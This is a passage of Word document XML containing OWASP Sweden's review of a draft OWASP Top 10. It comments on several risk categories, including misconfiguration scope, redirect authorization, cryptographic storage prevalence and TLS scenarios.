          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Misconfiguration</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>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lastRenderedPageBreak/>
        <w:t xml:space="preserve">Security </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="009C2FFD">
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="Times New Roman" w:hAnsi="Verdana" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>misconfig</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="009C2FFD">
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="Times New Roman" w:hAnsi="Verdana" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> really deserves its place on the list but the category has become too general. We feel the description covers everything from firewall setup via OS hardening and configuration management to application security. All these things are important for the overall security but OWASP is about application security. The scope should be narrowed to application </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="009C2FFD">
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="Times New Roman" w:hAnsi="Verdana" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>misconfiguration</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="009C2FFD">
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="Times New Roman" w:hAnsi="Verdana" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> of frameworks (Struts, Spring MVC, </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="009C2FFD">
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="Times New Roman" w:hAnsi="Verdana" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>ASP.NET</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="009C2FFD">
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="Times New Roman" w:hAnsi="Verdana" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">) and third-party libraries. This smaller scope might result in security </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="009C2FFD">
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="Times New Roman" w:hAnsi="Verdana" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>misconfig</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="009C2FFD">
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="Times New Roman" w:hAnsi="Verdana" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> falling out of the Top 10.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009C2FFD" w:rsidRPr="009C2FFD" w:rsidRDefault="009C2FFD" w:rsidP="009C2FFD">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="Times New Roman" w:hAnsi="Verdana" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pP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w:t>
      </w:r>
      <w:r w:rsidRPr="009C2FFD">
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="Times New Roman" w:hAnsi="Verdana" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>: Cut out the network, OS, and configuration mgmt parts and focus on application frameworks and third-party libraries.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009C2FFD" w:rsidRPr="009C2FFD" w:rsidRDefault="009C2FFD" w:rsidP="009C2FFD">
      <w:pPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
        <w:outlineLvl w:val="2"/>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="Times New Roman" w:hAnsi="Verdana" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009C2FFD">
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="Times New Roman" w:hAnsi="Verdana" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Failure to Restrict URL Access</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We think this type of flaw is more prevalent.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009C2FFD" w:rsidRPr="009C2FFD" w:rsidRDefault="009C2FFD" w:rsidP="009C2FFD">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="Times New Roman" w:hAnsi="Verdana" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pP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w:t>
      </w:r>
      <w:r w:rsidRPr="009C2FFD">
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="Times New Roman" w:hAnsi="Verdana" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>: Change Prevalence from Uncommon to Common (and recalculate the risk accordingly).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009C2FFD" w:rsidRPr="009C2FFD" w:rsidRDefault="009C2FFD" w:rsidP="009C2FFD">
      <w:pPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
        <w:outlineLvl w:val="2"/>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="Times New Roman" w:hAnsi="Verdana" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="009C2FFD">
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="Times New Roman" w:hAnsi="Verdana" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Unvalidated</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="009C2FFD">
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="Times New Roman" w:hAnsi="Verdana" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> Redirects and Forwards</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First, this risk description contains a good Business impact text. It addresses the reader directly and suggests questions to ask yourself when assessing your risk.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009C2FFD" w:rsidRPr="009C2FFD" w:rsidRDefault="009C2FFD" w:rsidP="009C2FFD">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="Times New Roman" w:hAnsi="Verdana" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pP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 xml:space="preserve">Second, the forward part of this category is a bit unclear. How common is it compared to </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="009C2FFD">
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="Times New Roman" w:hAnsi="Verdana" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>unvalidated</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="009C2FFD">
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="Times New Roman" w:hAnsi="Verdana" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> redirects? How </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="009C2FFD">
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="Times New Roman" w:hAnsi="Verdana" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>is it</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="009C2FFD">
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="Times New Roman" w:hAnsi="Verdana" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> typically exploited? Actually, we haven't seen such vulnerabilities in the wild.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009C2FFD" w:rsidRPr="009C2FFD" w:rsidRDefault="009C2FFD" w:rsidP="009C2FFD">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="Times New Roman" w:hAnsi="Verdana" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pP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 xml:space="preserve">Third, the prevention list item 3 suggests that any destination URL should be authorized </w:t>
      </w:r>
      <w:r w:rsidRPr="009C2FFD">
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="Times New Roman" w:hAnsi="Verdana" w:cs="Times New Roman"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>for</w:t>
      </w:r>
      <w:r w:rsidRPr="009C2FFD">
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="Times New Roman" w:hAnsi="Verdana" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> the user. It could also be authorized </w:t>
      </w:r>
      <w:r w:rsidRPr="009C2FFD">
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="Times New Roman" w:hAnsi="Verdana" w:cs="Times New Roman"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>by</w:t>
      </w:r>
      <w:r w:rsidRPr="009C2FFD">
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="Times New Roman" w:hAnsi="Verdana" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> the user, to prevent </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="009C2FFD">
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="Times New Roman" w:hAnsi="Verdana" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>phising</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="009C2FFD">
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="Times New Roman" w:hAnsi="Verdana" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>. For instance clicking https://www.yourbank.com/leave.php?http://www.owasp.org will result in a transport page saying "You are now leaving Your Bank. Please Confirm."</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009C2FFD" w:rsidRPr="009C2FFD" w:rsidRDefault="009C2FFD" w:rsidP="009C2FFD">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="Times New Roman" w:hAnsi="Verdana" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pP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 1</w:t>
      </w:r>
      <w:r w:rsidRPr="009C2FFD">
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="Times New Roman" w:hAnsi="Verdana" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">: Give a more clear explanation of the typical </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="009C2FFD">
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="Times New Roman" w:hAnsi="Verdana" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>unvalidated</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="009C2FFD">
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="Times New Roman" w:hAnsi="Verdana" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> forward flaw to motivate it on the top 10 list.</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 2</w:t>
      </w:r>
      <w:r w:rsidRPr="009C2FFD">
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="Times New Roman" w:hAnsi="Verdana" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">: Point out that destination URLs must be authorized </w:t>
      </w:r>
      <w:r w:rsidRPr="009C2FFD">
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="Times New Roman" w:hAnsi="Verdana" w:cs="Times New Roman"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>for or by</w:t>
      </w:r>
      <w:r w:rsidRPr="009C2FFD">
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="Times New Roman" w:hAnsi="Verdana" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> the user.</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Minor remark</w:t>
      </w:r>
      <w:r w:rsidRPr="009C2FFD">
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="Times New Roman" w:hAnsi="Verdana" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="009C2FFD">
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="Times New Roman" w:hAnsi="Verdana" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Detectability</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="009C2FFD">
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="Times New Roman" w:hAnsi="Verdana" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> Easy should be red, not yellow.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009C2FFD" w:rsidRPr="009C2FFD" w:rsidRDefault="009C2FFD" w:rsidP="009C2FFD">
      <w:pPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
        <w:outlineLvl w:val="2"/>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="Times New Roman" w:hAnsi="Verdana" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009C2FFD">
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="Times New Roman" w:hAnsi="Verdana" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Insecure Cryptographic Storage</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We experience this vulnerability to be quite common. The Am I Vulnerable section doesn't explain that exploitation of insecure cryptographic storage requires some other kind of security flaw such as SQL injection or Insecure Direct Object Reference.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009C2FFD" w:rsidRPr="009C2FFD" w:rsidRDefault="009C2FFD" w:rsidP="009C2FFD">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="Times New Roman" w:hAnsi="Verdana" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pP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 1</w:t>
      </w:r>
      <w:r w:rsidRPr="009C2FFD">
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="Times New Roman" w:hAnsi="Verdana" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>: Change the Prevalence from Uncommon to Common.</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 2</w:t>
      </w:r>
      <w:r w:rsidRPr="009C2FFD">
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="Times New Roman" w:hAnsi="Verdana" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>: Explain that exploitation requires some other kind of security flaw -- this flaw (only) makes other flaws more serious.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009C2FFD" w:rsidRPr="009C2FFD" w:rsidRDefault="009C2FFD" w:rsidP="009C2FFD">
      <w:pPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
        <w:outlineLvl w:val="2"/>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="Times New Roman" w:hAnsi="Verdana" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009C2FFD">
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="Times New Roman" w:hAnsi="Verdana" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Insufficient Transport Layer Protection</w:t>
      </w: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rPr>
        <w:t xml:space="preserve">The first attack scenario currently overlaps with Broken Authentication and Session Management (we suggest removing TLS from Broken Authentication). We would also like to see an example about non-SSL login pages with https posts or </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="009C2FFD">
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="Times New Roman" w:hAnsi="Verdana" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>iframed</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="009C2FFD">
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="Times New Roman" w:hAnsi="Verdana" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> SSL-parts, which are </w:t>
      </w:r>
      <w:r w:rsidRPr="009C2FFD">
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="Times New Roman" w:hAnsi="Verdana" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>very common. The list of references contains a link to the Top 10 2007 which might look odd.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009C2FFD" w:rsidRPr="009C2FFD" w:rsidRDefault="009C2FFD" w:rsidP="009C2FFD">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="Times New Roman" w:hAnsi="Verdana" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pP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 1</w:t>
      </w:r>
      <w:r w:rsidRPr="009C2FFD">
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="Times New Roman" w:hAnsi="Verdana" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">: Add a scenario about http login page with https post or </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="009C2FFD">
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="Times New Roman" w:hAnsi="Verdana" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>iframed</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="009C2FFD">
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="Times New Roman" w:hAnsi="Verdana" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> https page. </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="009C2FFD">
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="Times New Roman" w:hAnsi="Verdana" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Typical targets for </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="009C2FFD">
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="Times New Roman" w:hAnsi="Verdana" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>MItM</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="009C2FFD">
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="Times New Roman" w:hAnsi="Verdana" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> attacks with </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="009C2FFD">
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="Times New Roman" w:hAnsi="Verdana" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>SSLStrip</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="009C2FFD">
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="Times New Roman" w:hAnsi="Verdana" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>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color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>Suggestion 2</w:t>
      </w:r>
      <w:r w:rsidRPr="009C2FFD">
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="Times New Roman" w:hAnsi="Verdana" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>: Consider (re)moving the Top 10 2007 reference.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009C2FFD" w:rsidRPr="009C2FFD" w:rsidRDefault="009C2FFD" w:rsidP="009C2FFD">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="Times New Roman" w:hAnsi="Verdana" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="009C2FFD" w:rsidRPr="009C2FFD" w:rsidRDefault="009C2FFD" w:rsidP="009C2FFD">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="Times New Roman" w:hAnsi="Verdana" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009C2FFD">
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="Times New Roman" w:hAnsi="Verdana" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>That's all! A big Thank You to the OWASP Top 10 Project for all the hard work. We really appreciate it! (That's why we wanted to give you some thought-through feedback)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009C2FFD" w:rsidRPr="009C2FFD" w:rsidRDefault="009C2FFD" w:rsidP="009C2FFD">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="Times New Roman" w:hAnsi="Verdana" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00620578" w:rsidRDefault="009C2FFD" w:rsidP="007B2E45">
      <w:pPr>
        <w:spacing w:after="72" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="Times New Roman" w:hAnsi="Verdana" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009C2FFD">
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="Times New Roman" w:hAnsi="Verdana" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Regards, OWASP Sweden</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007B2E45" w:rsidRPr="007B2E45" w:rsidRDefault="007B2E45" w:rsidP="007B2E45">
      <w:pPr>
        <w:spacing w:after="72" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="Times New Roman" w:hAnsi="Verdana" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00620578" w:rsidRDefault="00C03D5B" w:rsidP="00C914CE">
      <w:pPr>
